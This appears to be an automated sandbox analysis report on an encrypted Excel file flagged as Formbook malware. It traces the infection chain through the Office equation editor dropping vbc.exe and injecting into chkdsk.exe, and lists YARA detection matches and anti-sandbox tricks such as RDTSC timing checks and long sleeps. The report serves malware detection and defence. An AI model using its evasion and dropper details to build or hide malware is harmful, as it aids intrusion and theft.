Source: C:\Users\Public\vbc.exe Code function: 4_2_00368998 4_2_00368998
Source: C:\Users\Public\vbc.exe Code function: 4_2_00363AE8 4_2_00363AE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_011D5148 4_2_011D5148
Source: C:\Users\Public\vbc.exe Code function: 5_2_011D5148 5_2_011D5148
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040102F 6_2_0040102F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408C4C 6_2_00408C4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408C50 6_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B493 6_2_0041B493
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CD28 6_2_0041CD28
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D87 6_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CE77 6_2_0041CE77
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E0C6 6_2_0085E0C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088D005 6_2_0088D005
Source: C:\Users\Public\vbc.exe Code function: 6_2_00863040 6_2_00863040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087905A 6_2_0087905A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E2E9 6_2_0085E2E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00901238 6_2_00901238
Source: C:\Users\Public\vbc.exe Code function: 6_2_009063BF 6_2_009063BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085F3CF 6_2_0085F3CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_008863DB 6_2_008863DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00862305 6_2_00862305
Source: C:\Users\Public\vbc.exe Code function: 6_2_00867353 6_2_00867353
Source: C:\Users\Public\vbc.exe Code function: 6_2_008AA37B 6_2_008AA37B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00895485 6_2_00895485
Source: C:\Users\Public\vbc.exe Code function: 6_2_00871489 6_2_00871489
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E443E 6_2_008E443E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0089D47D 6_2_0089D47D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087C5F0 6_2_0087C5F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086351F 6_2_0086351F
Source: C:\Users\Public\vbc.exe Code function: 6_2_008A6540 6_2_008A6540
Source: C:\Users\Public\vbc.exe Code function: 6_2_00864680 6_2_00864680
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086E6C1 6_2_0086E6C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00902622 6_2_00902622
Source: C:\Users\Public\vbc.exe Code function: 6_2_008AA634 6_2_008AA634
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E579A 6_2_008E579A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086C7BC 6_2_0086C7BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_008957C3 6_2_008957C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FF8EE 6_2_008FF8EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086C85C 6_2_0086C85C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088286D 6_2_0088286D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0090098E 6_2_0090098E
Source: C:\Users\Public\vbc.exe Code function: 6_2_008629B2 6_2_008629B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_008769FE 6_2_008769FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E394B 6_2_008E394B
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E5955 6_2_008E5955
Source: C:\Users\Public\vbc.exe Code function: 6_2_00913A83 6_2_00913A83
Source: C:\Users\Public\vbc.exe Code function: 6_2_0090CBA4 6_2_0090CBA4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085FBD7 6_2_0085FBD7
Source: C:\Users\Public\vbc.exe Code function: 6_2_008EDBDA 6_2_008EDBDA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00887B00 6_2_00887B00
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FFDDD 6_2_008FFDDD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00890D3B 6_2_00890D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086CD5B 6_2_0086CD5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00892E2F 6_2_00892E2F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087EE4C 6_2_0087EE4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FCFB1 6_2_008FCFB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_008D2FDC 6_2_008D2FDC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00870F3F 6_2_00870F3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088DF7C 6_2_0088DF7C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02621238 8_2_02621238
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257E2E9 8_2_0257E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02587353 8_2_02587353
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025CA37B 8_2_025CA37B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02582305 8_2_02582305
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025A63DB 8_2_025A63DB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257F3CF 8_2_0257F3CF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0259905A 8_2_0259905A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02583040 8_2_02583040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025AD005 8_2_025AD005
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257E0C6 8_2_0257E0C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02622622 8_2_02622622
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0258E6C1 8_2_0258E6C1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02584680 8_2_02584680
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025B57C3 8_2_025B57C3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0258C7BC 8_2_0258C7BC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0260579A 8_2_0260579A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025BD47D 8_2_025BD47D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02591489 8_2_02591489
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025B5485 8_2_025B5485
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025C6540 8_2_025C6540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0258351F 8_2_0258351F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0259C5F0 8_2_0259C5F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02633A83 8_2_02633A83
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025A7B00 8_2_025A7B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257FBD7 8_2_0257FBD7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0260DBDA 8_2_0260DBDA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0262CBA4 8_2_0262CBA4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0258C85C 8_2_0258C85C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025A286D 8_2_025A286D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0261F8EE 8_2_0261F8EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02605955 8_2_02605955
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025969FE 8_2_025969FE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025829B2 8_2_025829B2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0262098E 8_2_0262098E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0259EE4C 8_2_0259EE4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025B2E2F 8_2_025B2E2F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025ADF7C 8_2_025ADF7C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02590F3F 8_2_02590F3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0258CD5B 8_2_0258CD5B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025B0D3B 8_2_025B0D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0261FDDD 8_2_0261FDDD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009B493 8_2_0009B493
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00088C4C 8_2_00088C4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00088C50 8_2_00088C50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009CD28 8_2_0009CD28
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00082D87 8_2_00082D87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00082D90 8_2_00082D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009CE77 8_2_0009CE77
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00082FB0 8_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: NEW 01 13 2021.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0257DF5C appears 118 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0257E2A8 appears 38 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025C373B appears 238 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025EF970 appears 81 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025C3F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0085E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008CF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A373B appears 244 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A3F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0085DF5C appears 119 times
Yara signature match
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/6@6/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$NEW 01 13 2021.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFC87.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: NEW 01 13 2021.xlsx Virustotal: Detection: 29%
Source: NEW 01 13 2021.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: NEW 01 13 2021.xlsx Static file information: File size 1511936 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
Source: NEW 01 13 2021.xlsx Initial sample: OLE indicators vbamacros = False
Source: NEW 01 13 2021.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_003664FA push ebp; iretd 4_2_00366508
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040C8B1 push ss; iretd 6_2_0040C8B5
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B3F2 push eax; ret 6_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B3FB push eax; ret 6_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B3A5 push eax; ret 6_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B45C push eax; ret 6_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 6_2_00415CB8 push esi; ret 6_2_00415CB9
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041A5F2 push cs; retf 6_2_0041A5F3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085DFA1 push ecx; ret 6_2_0085DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257DFA1 push ecx; ret 8_2_0257DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009B3A5 push eax; ret 8_2_0009B3F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009B3FB push eax; ret 8_2_0009B462
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009B3F2 push eax; ret 8_2_0009B3F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009B45C push eax; ret 8_2_0009B462
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009A5F2 push cs; retf 8_2_0009A5F3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0008C8B1 push ss; iretd 8_2_0008C8B5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00095CB8 push esi; ret 8_2_00095CB9
Source: initial sample Static PE information: section name: .text entropy: 7.22615348682

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: NEW 01 13 2021.xlsx Stream path 'EncryptedPackage' entropy: 7.99984749113 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2812, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_004088A0 rdtsc 6_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
